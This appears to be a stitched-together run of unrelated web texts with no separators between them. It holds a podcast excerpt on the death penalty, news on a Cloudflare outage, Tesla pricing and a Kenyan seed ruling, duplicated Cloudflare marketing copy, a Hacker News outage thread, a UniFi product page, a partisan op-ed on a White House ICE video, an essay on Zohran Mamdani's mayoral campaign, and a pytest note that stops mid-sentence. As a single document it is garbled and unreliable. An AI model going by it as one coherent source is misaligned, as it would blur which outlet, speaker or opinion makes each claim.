That’s not what states do, right, in a civilized society. That one sentence ought to be enough. And it’s a symptom of how distorted this argument has become — that it’s not enough.
AL: Liliana, I want to briefly get your thoughts on this too.
LS: I think that people who are opposed to death penalty and abolitionists oftentimes say, “This is a broken system.” And we talk about prisons in that way; “this is a broken system.”
I think it’s a mistake to say that this is a broken system because I don’t think that this system, at its best, as you’ve just discussed, would be fine if it only worked correctly. I think that that’s absolutely not the case. So I do agree that, this system — I don’t hide the fact that I’m very opposed to the death penalty. I don’t think that you can design it and improve it and make it fair and make it just.
“I don’t think that you can design it and improve it and make it fair and make it just.”
I also think that part of the reason that people have a hard time saying that is: If you were to say that about the death penalty in this country, for all of the reasons that may be true, then you would be forced to deal with the criminal justice system more broadly , and with prisons and sentencing as a whole. And I think that there’s a real reluctance to see the problems that we see in death penalty cases in that broader context, because what does that mean for this country, if you’re calling into question on mass incarceration and in the purpose that these sentences serve.?
AL: We’ve covered a lot here. I want to thank you both for joining me on the Intercept Briefing.
MG: Thank you so much.
LS: Thank you.
A host of websites including LinkedIn , Zoom and Downdetector went offline on Friday morning after fresh problems at Cloudflare.
Cloudflare said shortly after 9am UK time that it was “investigating issues with Cloudflare Dashboard and related APIs”, referring to application programming interfaces.
The internet infrastructure provider said users had seen “a large number of empty pages” as a result. It added shortly after that it had implemented a potential fix and was monitoring the results.
A number of websites and platforms were down, including the Downdetector site used to monitor online service issues. Users reported problems with other websites including Zoom , LinkedIn, Shopify and Canva, although many are back online.
The Downdetector website recorded more than 4,500 reports related to Cloudflare after returning online.
The Indian-based stockbroker Groww said it was facing technical issues “due to a global outage at Cloudflare”. Its services have since been restored.
Cloudflare provides network and security services for many online businesses to help their websites and applications operate. It claims that about 20% of all websites use some form of its services.
It comes only three weeks after previous problems at Cloudflare hit the likes of X, ChatGPT, Spotify, and multiplayer games such as League of Legends.
after newsletter promotion
Jake Moore, a global cybersecurity adviser at ESET, said: “If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable. The problems often lie with the fact we are using an old network to direct internet users around the world to websites, but it simply highlights there is one huge single point of failure in this legacy design.”
Tesla has launched the lower-priced version of its Model 3 car in Europe in a push to revive sales after a backlash against Elon Musk’s work with Donald Trump and weakening demand for electric vehicles.
Musk, the electric car maker’s chief executive, has argued that the cheaper option, launched in the US in October, will reinvigorate demand by appealing to a wider range of buyers.
The new Model 3 Standard is listed at €37,970 (£33,166) in Germany, 330,056 Norwegian kroner (£24,473) and 449,990 Swedish kronor (£35,859). The move follows the launch of a lower-priced Model Y SUV , Tesla’s bestselling model, in Europe and the US.
Tesla sales have slumped across Europe as the company faces increasingly tough competition from its Chinese rival BYD, which outsold the US electric vehicle maker across the region for the first time in spring.
Sales across the EU have also been hurt by a buyer backlash against Musk’s support for Trump’s election campaign and period working in the president’s administration.
In his role running the “department of government efficiency”, or Doge, the tech billionaire led sweeping job cuts , but quit in May and after falling out with Trump over the “big, beautiful” tax and spending bill.
Musk has also alienated customers through other controversial political interventions, including appearing to give a Nazi salute at Trump’s victory rally, showing support for Germany’s far-right AfD party , and accusing Keir Starmer and other senior UK politicians of covering up the scandal about grooming gangs .
New taxes on electric cars in last month’s budget could undermine UK demand, critics have said. UK electric car sales grew at their slowest rate in two years in November, at just 3.6%, according to figures from the Society of Motor Manufacturers and Traders (SMMT).
“[This] should be seen as a wake-up call that a sustained increase in demand for EVs cannot be taken for granted,” said Mike Hawes, the chief executive of the SMMT. “We should be taking every opportunity to encourage drivers to make the switch, not punishing them for doing so.”
The chancellor’s new pay-per-mile road tax on EVs will charge drivers 3p for every mile from April 2028, costing motorists about £250 a year on average.
Feel free to tell what you plan on doing this weekend and even ask for help or feedback.
Please keep in mind it’s more than OK to do nothing at all too!
Cloudflare is down, as websites are crashing with a 500 Internal Server Error. Cloudflare has confirmed that it's investigating the reports.
Cloudflare, a service that many websites use to stay fast and secure, is currently facing problems.
Because of this, people visiting some websites are seeing a “500 Internal Server Error” message instead of the normal page.
A 500 error usually means something went wrong on the server side, not on the user’s device or internet connection.
In an update to its status page, Cloudflare says it's investigating issues with Cloudflare Dashboard and related APIs.
"Customers using the Dashboard / Cloudflare APIs are impacted as requests might fail and/or errors may be displayed," the company noted.
Cloudflare says it has implemented a fix, and websites should start coming back online soon.
This is a developing story....
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
KISUMU, Kenya (AP) — A high court in Kenya on Thursday declared unconstitutional sections of a seed law that prevented farmers from sharing and selling indigenous seeds in what food campaigners have called a landmark win for food security.
Farmers in Kenya could face up to two years’ imprisonment and a fine of 1 million Kenya shillings ($7,700) for sharing seeds through their community seed banks, according to a seed law signed in 2012.
Justice Rhoda Rutto on Thursday said sections of the seed law that gave government officials powers to raid seed banks and seize seeds were also unconstitutional.
The law was introduced as a measure to curb growing sale of counterfeit seeds that were causing loses in the agricultural sector and gave sole seed trading rights to licensed companies.
The case had been filed by 15 smallholder farmers, who are members of community seed banks that have been in operation for years, preserving and sharing seeds among colleagues.
A farmer, Samuel Wathome, who was among the 15, said the old farming practices had been vindicated.
“My grandmother saved seeds, and today the court has said I can do the same for my grandchildren without fear of the police or of prison,” he said.
Elizabeth Atieno, a food campaigner at Greenpeace Africa, called the win a “victory for our culture, our resilience, and our future.”
“By validating indigenous seeds, the court has struck a blow against the corporate capture of our food system. We can finally say that in Kenya, feeding your community with climate-resilient, locally adapted seeds is no longer a crime,” she said.
Food campaigners have in the past encouraged governments to work with farmers to preserve indigenous seeds as a way of ensuring food security by offering farmers more plant varieties.
Indigenous seeds are believed to be drought resistant and adaptable to the climate conditions of their native areas, and hence often outperform hybrid seeds.
Kenya has a national seed bank based near the capital Nairobi where indigenous seeds are stored in cold rooms, but farmers say community seed banks are equally important for variety and proximity to the farmer.
The country has faced challenges in the seed sector where counterfeit seeds were sold to farmers, leading to losses amounting to millions of shillings in a country that relies on rain-fed agriculture.
Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.
Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.
Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.
Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.
Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.
60+
cloud services available globally
234B
cyber threats blocked each day
20%
of all websites are protected by Cloudflare
330+
cities in 125+ countries, including mainland China
Stop bot attacks in real time by harnessing data from millions of websites protected by Cloudflare.
Build serverless applications and deploy instantly across the globe for speed, reliability, and scale.
Get easy, instant access to Cloudflare security and performance services.
Get a personalized product recommendation for your specific needs.
Have questions or want to get a demo? Get in touch with one of our experts.
|
|
Is Cloudflare Down Again? Also, DownDetector/Claude.ai/LinkedIn? | |
| 18 points by dfasoro 30 minutes ago | hide | past | favorite | 4 comments | ||
|
I was writing a blogpost on Medium and I noticed errors, tried to open LinkedIn? down. tried downdetector? down. Claude.ai is also down |
||
|
|||
|
|||
|
|||
|
|
|
|
JoeWiltshire 20 minutes ago | [–] https://downdetectorsdowndetectorsdowndetectorsdowndetector.... reports that https://downdetectorsdowndetectorsdowndetector.com/ is down, guessing downdetectorsdowndetectorsdowndetector runs via cloudflare! |
|
|
|
designerarvid 15 minutes ago | | [–] |
|
|
|
yellowbanana 19 minutes ago | | | [–] This is art |
|
|
|
ablation 18 minutes ago | | [–] Already being discussed here: https://news.ycombinator.com/item?id=46158191 |
|
|
|
Jsmith4523 9 minutes ago | | [–] You know what, maybe AI is taking all the goddamn jobs |
|
|
|
immibis 0 minutes ago | | [–] They pretty much said this. All the big companies that had recent outages are companies that publicly embraced vibe coding. |
|
|
|
jakewins 21 minutes ago | | [–] Incident link at cloudflare: https://www.cloudflarestatus.com/incidents/lfrm31y6sw9q |
|
|
|
ericcurtin 22 minutes ago | | [–] Time to use some local ai with Docker Model Runner :) No cloudflare no problem |
|
|
|
pyuser583 16 minutes ago | | [–] I assume this is why Claude stopped working |
|
|
|
lionkor 3 minutes ago | | [–] There are other LLMs you can ask to be absolutely, 100% sure. |
|
|
|
PascalStehling 28 minutes ago | | [–] downdetectors downdetector shows that downdector should not be down. Something is wrong here. |
|
|
|
Lionga 24 minutes ago | | [–] |
|
|
|
Vivianfromtheo 19 minutes ago | | [–] Crunchyroll down too got me and the anime community stressed |
|
|
|
B4n4n4 26 minutes ago | | [–] LinkedIn down |
|
|
|
Folyd 27 minutes ago | | [–] i can confirm it down again |
|
|
|
pappya_coder 25 minutes ago | | [–] Yes |
|
|
|
RockRobotRock 31 minutes ago | [–] jesus fucking christ i just wanna play runescape |
|
|
|
JimmaDaRustla 19 minutes ago | [–] This made getting paged at 4am worth it |
Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.
Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.
Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.
Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.
Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.
60+
cloud services available globally
234B
cyber threats blocked each day
20%
of all websites are protected by Cloudflare
330+
cities in 125+ countries, including mainland China
Stop bot attacks in real time by harnessing data from millions of websites protected by Cloudflare.
Build serverless applications and deploy instantly across the globe for speed, reliability, and scale.
Get easy, instant access to Cloudflare security and performance services.
Get a personalized product recommendation for your specific needs.
Have questions or want to get a demo? Get in touch with one of our experts.
4 December 2025
The UniFi 5G Max lineup was created with a clear goal in mind: deliver a sleek, versatile, and exceptionally powerful 5G internet experience that works effortlessly in any environment.
The UniFi 5G Max makes deployment easy, whether installed locally or at a remote site. Plug it into any PoE port and it instantly appears as a ready to use WAN interface, no matter whether plugged directly into your UniFi gateway or into your office switch. No new cable runs needed! It sits neatly on a desk, but you can reposition it for the best possible signal using the included wall or window mount.
A compact form factor designed for fast installation and flexible placement at the core or edge.
The 5G Max delivers downlink speeds up to 2 Gbps with ultra low latency that makes it reliable as a primary connection and seamless as a backup WAN. UniFi routing policies and SLAs let you choose exactly how and when 5G is used, and for which clients and VLANs. Easily set per-SIM usage limits to avoid overage costs with just a few clicks.
High speed 5G that adapts to your network's rules, not the other way around.
For tougher environments or deployments with poor indoor cellular coverage, the outdoor model maintains the same high performance cellular connectivity with improved antenna performance in a durable IP67 rated enclosure. It is built for rooftop installs, off site locations, and mobile deployments where reliability is critical. Just like its indoor counterpart, you can also connect it via any PoE port, anywhere on your network, greatly simplifying cabling requirements.
A weatherproof 5G device built for reliability wherever you place it.
If you want everything UniFi in one device, the DreamRouter 5G Max combines 5G connectivity with WiFi 7, local storage, and full UniFi OS application support. Deploy it anywhere 5G is available and run an entire high-performance and scalable network stack instantly.
A complete UniFi system powered by the reach and speed of 5G.
Every device in the UniFi 5G lineup supports both physical SIMs and eSIM, giving you the freedom to choose your carrier and switch whenever needed with zero friction. All are equipped with dual SIM slots, with one SIM replaceable by eSIM, and are fully unlocked: any major carrier, any type of deployment, with one piece of hardware.
Carrier freedom built directly into the hardware from day 1.
The UniFi 5G lineup brings sleek design, powerful performance, easy installation, and genuine WAN flexibility to every deployment.
The Trump White House just showed us something every American should find chilling, no matter what music they listen to or what party they vote for.
They took a video of aggressive ICE arrests, slapped Sabrina Carpenter’s song on top of it, and posted it like it was a victory lap. Then, when Carpenter objected and said the video was “evil and disgusting” and told them not to use her music to benefit an “inhumane agenda,” the White House hit back with a statement that sounded like it came from a playground bully, not the seat of American government.
They didn’t debate her point. They didn’t defend policy with facts. They went straight to dehumanization and insult, calling people “illegal murderers, rapists, and pedophiles,” and saying anyone who defends them must be “stupid” or “slow.”
That’s not just ugly: it’s a warning.
Because the biggest story here is not a celebrity clapback; it’s that the White House is using the power of the state to turn human beings into a violence-normalizing punchline, and using America’s culture as a weapon to spread it.
This is what rising authoritarianism looks like in the age of social media.
A democracy survives on shared reality and shared humanity. It survives when the government understands that it works for the people and must be accountable to the Constitution, to due process, and to basic human decency.
But what happens when a government starts producing propaganda like it’s a teenage streamer chasing clicks and the president runs the White House like it’s a reality show operation, right down to the televised Cabinet meetings?
We get a machine that can normalize cruelty. We get a public trained to cheer at humiliation. We get outrage as entertainment. And we get the steady erosion of our ability to ask the most important questions in a free society.
Was this legal? Was it justified? Was it proportional? Was it humane? Were innocent people caught up? Were families separated? Was there due process? Is it even constitutional?
Those questions disappear when the government turns an ICE arrest into a meme.
There are, of course, serious crimes in every society and violent criminals should be held accountable under the law. But that isn’t what the White House statement was doing. It was, instead, engaged in something far more ancient, cynical, and dangerous.
It was trying to paint everyone in that video with the worst label imaginable so the public stops caring about what happens next.
That’s how they get permission — both explicit and implicit — for abuses.
If the audience for Trump’s sick reality show is told, “These are monsters,” then — as we’ve most recently seen both with ICE here domestically and with people in small boats off the coast of Venezuela — any cruelty becomes acceptable.
Any killing becomes a shrug. Overreach becomes a punchline. And following the rule of law becomes something we apply to our friends while we throw it away for people we have been taught to hate.
That is exactly why authoritarians always start by dehumanizing a target group.
And it always spreads.
Trump started by demonizing and then going after immigrants. Then he demanded fealty (and millions of dollars) from journalists, universities, and news organizations. He demonizes his political opponents to the point they suffer death threats, attacks, and assassinations. And if Trump keeps going down this same path — as Pastor Niemöller famously warned the world — it’ll next be you and me.
Consider this regime’s cultural warfare program. The White House has reportedly used music from multiple artists without permission and now brags that they’ve used those creators’ work to bait outrage, to “own the libs.”
All to drive attention, create spectacle, and turn governance into a constant fight as they punish anyone in public life — today it’s Sabrina Carpenter — who dares to speak up.
This is intimidation pretending to be a joke. If you’re an artist, a teacher, an organizer, or just a person with a platform, the message is simple: “We can drag you into our propaganda machine whenever we want, and if you object we’ll mock you and send an online — and often physical — mob after you.”
That’s a chilling reality, and it matters in a democracy. People start to think twice before speaking. They start to retreat. They start to self censor.
And that’s the Trump regime’s first goal.
Then there’s the distraction, particularly from a cratering economy and Trump’s association with Epstein and Maxwell.
With this strategy, borrowed from the Nazis (as my guest on the radio show Monday, Lawrence Reese, noted in his book The Nazi Mind: 12 Warnings From History ), culture war isn’t a sideshow anymore, it’s part of a larger strategy.
When the government posts a meme like the one where ICE used Carpenter’s music, it isn’t trying to inform us: it’s trying to trigger us. It’s trying to bait us into amplifying the clip, fighting over the celebrity angle, and losing sight of the real issue.
And that real issue is Trump’s and the GOP’s insatiable lust for state power and the wealth that power can allow, bring, and protect.
Armed agents. Detention. Deportation. Families. Fear. Mistakes that can’t be undone. Human beings who can be disappeared from their communities with the tap of a button and a viral soundtrack. Or killed by “suicide” in a jail cell when they threaten to go public.
If we care about freedom, we can’t just stand by and say nothing while this regime turns ICE’s violence into content.
Because once a government learns it can win political points by broadcasting humiliation, it’ll do it again. And it’ll escalate. It’ll push the line farther and farther until we wake up one day and wonder how we got here.
So what do we do?
First , stop amplifying their propaganda on their terms. Don’t share their clips as entertainment, even to condemn them without context (no links in this article). When you must talk about it, talk about the power being abused, not the celebrity drama.
Second , demand oversight. Call your members of Congress (202-224-3121). Demand hearings on ICE media practices and the use of official government accounts and our tax dollars to promote dehumanizing propaganda. Demand transparency on how these videos are produced, approved, and distributed.
Third , support civil liberties groups and immigrant rights organizations that challenge abuses in court and document what’s happening on the ground. Democracy requires watchdogs like them when the people in power act like they’re above the law.
Fourth , get inside the Democratic Party and vote — and help others vote — like it matters, because it does. Local prosecutors, sheriffs, governors, attorneys general, and members of Congress all shape how far this culture of cruelty can spread. Authoritarians rely on fatigue and cynicism: Don’t give them either: participate.
And finally, speak up. Sabrina Carpenter did, and she was right to. Not because she’s a pop star, but because she named the moral truth that the White House is trying to smother with what they pretend are jokes.
When a government starts celebrating the humiliation of vulnerable people, it’s telling the world that it no longer sees itself as the servant of a democratic republic. Of all the people. Instead, it now sees itself as the applause-hungry enforcer of a bloodthirsty tribe.
If we let this become normal, we will — one day soon — no longer recognize our country.
This is the moment to draw a line.
Not just for immigrants. Not just for artists. For the Constitution. For due process. For human dignity. For the idea that in America, power is accountable.
Call. Organize. Vote. Let’s not let cruelty become America’s official language.
The Hidden History of Monopolies: How Big Business Destroyed the American Dream " (2020); " The Hidden History of the Supreme Court and the Betrayal of America " (2019); and more than 25 other books in print.]
When was the last time being on the left was fun? Even in the best of times, supporting socialism in America can feel like performing a grim duty in the face of almost certain disappointment. The chapter titles in Burnout , Hannah Proctor’s investigation of the emotional landscapes of leftist militancy, are revealing: Melancholia, Nostalgia, Depression, Burnout, Exhaustion, Bitterness, Trauma, Mourning. One of the many virtues of Zohran Mamdani’s remarkable campaign for New York City mayor was that it never felt this way, not even when he was sitting near the bottom of the polls. It was a year-long act of collective joy. Real joy—not the brief sugar high that surged when Kamala Harris replaced Joe Biden at the top of the Democrats’ 2024 ticket. Volunteering for Mamdani never felt like a chore, even when the weather was bad and fewer canvassers showed up for their shift than expected. It was a blast from start to finish, and we didn’t even have to console ourselves with a moral victory. This time, we actually won.
We tend to speak of voting as a civic duty, and of boosting voter participation as a high-minded, “good government” concern. The nature of mass politics, however, has often been anything but staid and responsible. Michael McGerr begins his book The Decline of Popular Politics with a colorful account of a Democratic Party “flag raising” in New Haven in 1876. It was a raucous affair, complete with torchlight parades, street corner speeches, brass bands, fireworks, and rivers of booze courtesy of local party notables. Political spectacle hasn’t gone away, but since the advent of modern communications technology it has become enormously mediated. By contrast, historian Richard Bensel has described the “sheer physicality of voting” and party politics in the nineteenth century. People flocked to the polls, Bensel writes, “simply because they were exciting, richly endowed with ethno-cultural themes of identity, manhood, and mutual recognition of community standing.” It was party politics, in both senses of the word.
This era should not be romanticized. Aside from the fact that only men could vote, the atmosphere of drink-soddened masculinity that pervaded election campaigns kept most women away even when it did not descend into partisan and racial violence. Even so, it is hard not to agree with political scientists Daniel Schlozman and Sam Rosenfeld that America’s early mass parties “bequeathed a genuinely popular and participatory” culture whose “promise still haunts American politics.”
Much has been made of Mamdani’s extremely effective use of social media, short-form video, and other digital formats that speak to the younger and disengaged voters many other campaigns struggle to reach. There’s no doubt this was a major ingredient in the campaign’s success; historically high rates of participation among Gen Z and newly registered voters testify to its effectiveness. But the sheer physicality of the Mamdani campaign, and the ways it used digital media to bring people together offline, has been underrated.
Consider the citywide scavenger hunt in August. A call went out over social media on a Saturday night, and thousands of people showed up the next morning to race around seven stops across the boroughs, each one connected to the city’s history. Disgraced incumbent mayor Eric Adams denounced the frivolity: “I’m sure a scavenger hunt was fun for the people with nothing better to do. . . . Mamdani is trying to turn our city into the Squid Games.” One competitor offered a different perspective : “I think actually trying to have fun in politics and do a little bit of a community building exercise, a way to actually learn about our city—I’ve never known another politician to do it.”
The scavenger hunt was just one example of the campaign’s popular and participatory culture. So much of the campaign was in public and in person: mass rallies, a walk through the entire length of Manhattan, unannounced appearances at clubs and concerts, a 100,000-strong army of volunteers who braved countless walk-ups to knock over 1 million doors. From early spring through November’s general election, the campaign assumed the scale and spirit of a social movement, or a Knicks playoff run. There was a palpable buzz around the city—not just in what New York electoral data maven Michael Lange termed the “ Commie Corridor ” neighborhoods, populated by young college-educated leftists, but in Little Pakistan, Little Bangladesh, Parkchester, and other places where nary a New Yorker tote bag can be found.
When the polls closed, more than 2 million voters had cast their ballots, the highest turnout in a New York City mayoral election since 1969. More than 1 million voters, just over half the electorate, voted for Mamdani. At the same time, over 850,000 voted for Andrew Cuomo, who successfully consolidated many Republican voters behind his second-effort bid to return to public office. Another 146,000 voted for the official Republican candidate, the perennial also-ran Curtis Sliwa.
Mamdani’s shockingly decisive win in the Democratic primary had been powered by his core constituencies: younger voters, college-educated renters, and South Asian and Muslim voters, many of whom participated in the electoral process for the first time. He carried these constituencies with him into the general election, but he may have struggled to win the final contest without rallying large numbers of working-class Black and Hispanic voters too. As Lange has shown , the areas that shifted most strongly toward Mamdani from the primary to the general election were Black and Hispanic neighborhoods in the Bronx, Brooklyn, and Queens. Many Black and Hispanic voters under forty-five were already in Mamdani’s column in the primary, but his numbers then were far lower among their parents and grandparents. After securing the Democratic nomination, his campaign made inroads by building relationships with Black church congregations and community organizations, as well as labor unions with disproportionately Black and Hispanic memberships. By cobbling these disparate constituencies together in the general election, Lange concluded, Mamdani successfully renewed the promise of the Rainbow Coalition for the twenty-first century.
Explaining how Mamdani did this has become something of a Rorschach test for pundits. Much of the commentary has focused on his campaign’s affordability agenda, which targeted the city’s cost-of-living crisis through proposals for freezing rents, eliminating fares on city buses, and implementing universal child care, among others. While Mamdani’s emphasis on affordability was necessary for securing the victory, and his economic proposals were popular across his constituencies, he would not have been able to mobilize the coalition he did on the strength of bread-and-butter appeals alone. Mamdani’s unequivocal stances on “non-economic” questions like the genocide in Gaza or the ICE raids terrorizing immigrant communities built trust among precisely the people he needed to join his volunteer army or turn out to vote for the first time.
Support for Palestine dovetailed with Mamdani’s vocal opposition to the Trump administration’s assault on immigrants, which came together in an impromptu confrontation with Trump’s “border czar” Tom Homan last March. A video of the encounter , in which Mamdani challenged Homan over the illegal detention of Palestinian solidarity activist Mahmoud Khalil, circulated widely on social media and in immigrant communities. All of this helped Mamdani link his economic program with opposition to the president’s authoritarian lurch. In doing so, he appealed to immigrant voters worried about both ICE raids and making the rent, as well as voters who want their representatives to stand up to masked federal agents snatching people off the streets and whisking them away in unmarked cars. Moreover, Mamdani’s identity as a Muslim of South Asian descent undoubtedly activated demobilized voters excited by the idea of seeing someone like them in Gracie Mansion. The historic turnout surge that swept Muslim and South Asian neighborhoods in the outer boroughs is inseparable from Mamdani’s faith, his cultural fluency, and his outspoken defense of fellow Muslims against the Cuomo campaign’s Islamophobic bigotry.
The New York City chapter of the Democratic Socialists of America (NYC-DSA) has received a lot of credit for Mamdani’s victory, and rightfully so. Mamdani is a DSA member, as are his chief of staff, field director, and other key advisers. The campaign’s field leads, who organized canvassing shifts, were disproportionately members (I co-led a weekly canvass in my Brooklyn neighborhood during the primary). But organizations rooted in South Asian and Muslim communities deserve their fair share of the credit, including Desis Rising Up and Moving (DRUM) Beats, the Muslim Democratic Club of New York, Bangladeshi Americans for Political Progress, and grassroots affinity groups like Pakistanis for Zohran and Bangladeshis for Zohran. The mobilization of these communities transformed the electorate and helped Mamdani offset Cuomo’s strength in neighborhoods that shifted sharply to the former governor in the general election.
There are nearly 1 million Muslims in New York, but until Mamdani’s campaign they were a sleeping giant in local politics. Roughly 350,000 Muslims were registered, but only 12 percent of registered Muslims turned out to vote in the 2021 mayoral election. Mamdani’s campaign turned this dynamic completely on its head. DRUM Beats, which has organizing bases in the Bronx, Brooklyn, and Queens spanning a range of South Asian and Indo-Caribbean diasporic communities, played a key role. Their organizers are committed and tenacious, and many of them are women. “We’re like a gang,” the group’s organizing director Kazi Fouzia told a Politico reporter last summer. “When we go to any shop, people just move aside and say, ‘Oh my god. The DRUM leaders are here. The DRUM women are here.’” When Mamdani recognized “every New Yorker in Kensington and Midwood” in his victory speech, he had in mind the scores of aunties who ran themselves ragged knocking doors, sending texts, and making phone calls.
In their post-election analysis of the voting data, DRUM Beats detailed an enormous increase in turnout in the communities they organize. Based on Board of Elections data and their own models, they estimated that from 2021 to 2025 South Asian turnout exploded from 15.3 percent to nearly 43 percent, while Muslim turnout went from barely 15 percent to over 34 percent. While representing just 7 percent of New York’s registered voters, they accounted for an estimated 15 percent of actual voters in the general election. Nearly half of the city’s registered Bangladeshi and Pakistani American voters participated in the election, outpacing the overall participation rate of roughly 42 percent. This historic development didn’t materialize out of thin air. Mamdani’s faith, identity, and raw talent certainly didn’t hurt, but people on the ground have been quietly building civic infrastructure in these neighborhoods. In his assessment of the South Asian surge, electoral strategist Waleed Shahid noted that the places with the biggest gains were precisely “the places where DRUM Beats and allied organizers have spent years knocking doors, translating ballot measures, convening tenant meetings in basement prayer rooms, and building lists through WhatsApp groups and WhatsApp rumors alike.” I had the good fortune of getting to know some of these organizers during the campaign. Their capacity to mobilize working-class immigrants who had been overlooked for too long is formidable, and Mamdani’s victory cannot be explained without it.
Mamdani claimed the legacy of Fiorello La Guardia and Vito Marcantonio in the campaign’s final days, and the historical resonances ran deep. Shahid drew a parallel between the current moment and earlier realignments in the city’s political history “when groups written off as threatening or foreign became disciplined voting blocs: Irish Catholics moving from despised outsiders to Tammany’s core; Jewish and Italian workers turning the Lower East Side into a labor/socialist stronghold.” I am a product of New York’s twentieth-century Italian American diaspora myself. In rooms full of South Asian aunties for Zohran, wearing headscarves and plying everyone with plates of food, I saw people who in a different time could have been my own relatives stumping for the Little Flower, the legendary figure who was once told New York wasn’t ready for an Italian mayor. Turns out it was ready for an Italian mayor then, and it’s ready for a Muslim mayor now.
Donald Trump’s return to the presidency set off a war of white papers on Democratic Party electoral strategy that shows few signs of a ceasefire. There are a variety of strategic prescriptions, but many of them fall into two broad and infelicitously named camps: popularists and deliverists. Popularists tend to hail from the party’s moderate wing, but not always. There is a leftist variety of popularism, for example, that finds expression in projects like the Center for Working-Class Politics. Ezra Klein has offered perhaps the clearest definition of the popularist persuasion: “Democrats should do a lot of polling to figure out which of their views are popular and which are not popular, and then they should talk about the popular stuff and shut up about the unpopular stuff.” Deliverism, by contrast, focuses less on campaigning and more on governing. As Matt Stoller summarized it in a tweet: “deliver and it helps you win elections. Don’t deliver and you lose.” When Democrats are in power, they should implement bold policies that improve people’s lives and then reap the rewards from a satisfied electorate.
There is an element of “duh, of course” to both schools of thought, but the weaknesses are easy to spot. Popularism seeks to mirror the current state of public opinion for the sake of electoral success, but public opinion is malleable and sometimes quite fickle. One need only look at the wildly fluctuating data on immigration attitudes since the 2024 election to see how quickly chasing public opinion can become a fool’s errand. Deliverism, by contrast, presumes “a linear and direct relationship between economic policy and people’s political allegiances,” as Deepak Bhargava, Shahrzad Shams, and Harry Hanbury put it . But that’s not typically how real people operate. The Biden administration was, in many respects, an experiment in deliverism that failed to deliver. It implemented policies that brought tangible benefits to millions of people but still couldn’t prevent Trump from returning to the White House.
The limitations of both popularism and deliverism have opened space for a new school of thought, one that tackles strategic electoral questions from a different angle (but also has a terrible name): partyism. The political scientist Henry Farrell has usefully summarized its premises: the Democratic Party’s fundamental problem is not its ideological positioning but the fact that it’s not a political party in any real sense. “If Democrats want to succeed,” Farrell writes, they need to “build up the Democratic party as a coherent organization that connects leaders to ordinary people.” In their book The Hollow Parties , Daniel Schlozman and Sam Rosenfeld trace how the Democratic and Republican parties alike have been transformed into rival “blobs” of consultants, donors, strategists, and interest groups. Their critique has been influential, and it has informed a spate of proposals for turning the Democratic Party into a network of civic institutions that engages voters between elections and mediates effectively between leaders and the base.
The Mamdani campaign was arguably the first major test of the partyist approach in practice. While there is no indication that campaign leaders and strategists consciously appropriated these ideas, it is not difficult to see the affinities between them. The campaign brought new and disengaged voters into the fold through novel activities like the scavenger hunt and the Cost of Living Classic, a citywide soccer tournament held in Coney Island. Its sinew and muscle came not from TikTok or Instagram, but rooted civic organizations like NYC-DSA, DRUM Beats, United Auto Workers Region 9A, and the mosques, synagogues, and churches that opened their doors to the candidate. Even four of the five Democratic Party county committees in the city endorsed him, despite their historic wariness of insurgent candidates from the democratic socialist left (only the Queens county committee, a stronghold of dead-end Cuomo supporters, snubbed him). Mamdani’s victory was based, to a significant extent, on organizations with real members who engage in meaningful civic and political activity.
Of all the organizations listed above, however, the least important by far are the official bodies of the Democratic Party. The Mamdani campaign may have embodied an emergent partyist politics, but this is a partyism without the party. NYC-DSA’s electoral strategy, for example, is grounded in the concept of the “party surrogate” first proposed by Jacobin ’s Seth Ackerman and developed further by the political scientist Adam Hilton and others. Given the daunting odds of successfully establishing any new party, Hilton proposes a network of chapter-based organizations “oriented toward building a base within working-class communities and labor unions that can also act as an effective independent pressure group on the Democratic Party.” This is precisely what Mamdani and other socialist candidates have done. Primary voters—not party organizations—decide candidate nominations, which radically reduces the incentives for transforming those organizations. Why fill in the hollow parties when you can do much the same thing outside of them?
For now, at least, partyist projects like the one that catapulted Mamdani into political stardom will continue to gestate outside of any formal party organization. The NYC-DSA chapter has doubled in size to 13,000 members since 2024, and that number will likely continue to grow. Organizers have established a new organization called Our Time that is focused on mobilizing campaign volunteers in support of Mamdani’s agenda after he is sworn into office. NYC-DSA, DRUM Beats, labor unions, tenant groups, and other organizations that endorsed Mamdani during the campaign have established a formal coalition called the People’s Majority Alliance to do much the same thing at the organizational leadership level. So it seems unlikely that Mamdani’s coalition will demobilize the way Barack Obama’s did after 2008. These are independent organizations, constituted outside of official Democratic Party institutions, that assume the base-building and mobilization functions a party would carry out directly in most other political systems. This is the form popular and participatory politics takes in the age of hollow parties, raising the possibility that a lost culture once sustained by precinct captains, ward heelers, and saloon keepers could be reborn in a new way.
Rolling back MAGA will require speaking to popular needs and aspirations and delivering on them. It will also require developing our capacities to work together in a spirit of democratic cooperation and public exuberance. The Mamdani campaign laid the foundations for this in one city, but here and elsewhere much more reconstruction remains to be done.
[ Chris Maisano is a trade unionist and Democratic Socialists of America activist. He lives in Brooklyn, New York.]
TIL: Subtests in pytest 9.0.0+ . I spotted an interesting new feature in the release notes for pytest 9.0.0 : subtests .
I'm a big user of the pytest.mark.parametrize decorator - see Documentation unit tests from 2018 - so I thought it would be interesting to try out subtests and see if they're a useful alternative.
Short version: this parameterized test:
@pytest.mark.parametrize("setting", app.SETTINGS) def test_settings_are_documented(settings_headings, setting): assert setting.name in settings_headings
Becomes this using subtests instead:
